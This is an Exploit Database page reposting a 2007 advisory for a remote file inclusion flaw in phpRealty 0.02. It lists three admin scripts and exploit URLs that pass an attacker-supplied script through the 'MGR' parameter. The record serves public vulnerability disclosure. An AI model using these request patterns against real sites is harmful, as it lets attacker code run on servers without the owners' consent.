Exploit Database - Logo

phpRealty 0.02 - 'MGR' Parameter Multiple Remote File Inclusion

EDB-ID: 4387 Author: QTRinux Published: 2007-09-10
CVE: CVE-2007-4834 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
|-------------------------------------------------------------------------------|
| |
| phpRealty 0.02  (MGR) Remote File include |
| |
| Script : phpRealty |
| Version : 0.02 |
| Authord : QTRinux |
| Contact : Qataro [at] hotmail [dot] com |
| Vendor : http://phprealty.budissy.com/phprealty/v0.02/ |
| DorK :   :(
|-------------------------------------------------------------------------------|
| Bug in : |
| manager/admin/index.php |
| manager/admin/p_ins.php  |
| manager/admin/u_ins.php  |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : AlQaTaR!,MR.SH4R3S,Mo0oTeC,MaZaGi, |
| |
---------------------[ [Qatar Security Team] ]-------------------------

# milw0rm.com [2007-09-10]

Related Exploits

Trying to match CVEs (1): CVE-2007-4834
Trying to match OSVDBs (3): 37074, 37075, 37076
Trying to match setup file: 53ae3c5fa954758009bba11845f135cf
Other Possible E-DB Search Terms: phpRealty 0.02,  phpRealty
Date D V Title Author
2008-09-17Download Exploit Code Verified phpRealty 0.3 - 'INC' Parameter Remote File Inclusionka0x
Menu